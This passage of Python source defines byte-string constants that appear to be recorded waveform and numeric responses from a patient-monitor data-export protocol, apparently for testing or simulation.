b"\x08\x4c\x08\x99\x08\xe4\x09\x2f\x09\x78\x09\xbf\x0a\x03\x0a\x44" \ b"\x0a\x83" rsp_wave_5_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x10\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x20\x01\x20\x05\x20\x0b\x20\x11\x20\x15\x20\x1d\x20\x23" \ b"\x20\x29\x20\x31\x20\x37\x20\x3d\x20\x45\x20\x4d\x20\x53\x20\x59" \ b"\x20\x5f\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0a\xbd\x0a\xf3\x0b\x25\x0b\x53\x0b\x7b\x0b\x9f\x0b\xbd" \ b"\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5" \ b"\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0" \ b"\x0a\x9d\x0a\x68\x0a\x31\x09\xf9\x09\xbf\x09\x85\x09\x4b\x09\x10" \ b"\x08\xd7" rsp_wave_5_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x18\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x20\x25\x20\x28\x20\x2b\x20\x2e\x20\x31\x20\x33\x20\x30" \ b"\x20\x30\x20\x2d\x20\x2a\x20\x28\x20\x26\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x01\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x20\x67\x20\x6d\x20\x73\x20\x79\x20\x7b\x20\x77\x20\x75" \ b"\x20\x6d\x20\x67\x20\x61\x20\x59\x20\x51\x20\x4b\x20\x43\x20\x3b" \ b"\x20\x35\x20\x2d\x20\x25\x20\x1d\x20\x17\x20\x0f\x20\x07\x20\x01" \ b"\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf1\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x08\x9e\x08\x66\x08\x30\x07\xfb\x07\xc9\x07\x99\x07\x6b" \ b"\x07\x40\x07\x18\x06\xf3\x06\xd2\x06\xb3\x06\x97\x06\x7f\x06\x69" \ b"\x06\x57\x06\x47\x06\x3a\x06\x2f\x06\x27\x06\x21\x06\x1d\x06\x1a" \ b"\x06\x19\x06\x19\x06\x1a\x06\x1b\x06\x1d\x06\x1e\x06\x20\x06\x20" \ b"\x06\x20" rsp_nu_6_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_6_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_6_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x4f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_6_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x46\x00\x04\x00\x07\x04\x40\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x36\x00\x03\x00\x00\x0e\x80\x20\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x1c\x00\x00\x00\x04" \ b"\x04\x16\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5" \ b"\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef" \ b"\x1f\xed\x1f\xed\x1f\xec\x1f\xeb\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7" \ b"\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf" \ b"\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb\x1f\xda\x1f\xd9\x1f\xd8\x1f\xd8" \ b"\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0" \ b"\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8" \ b"\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde\x1f\xdf\x1f\xe0\x1f\xe1\x1f\xe3" \ b"\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed" \ b"\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7" \ b"\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 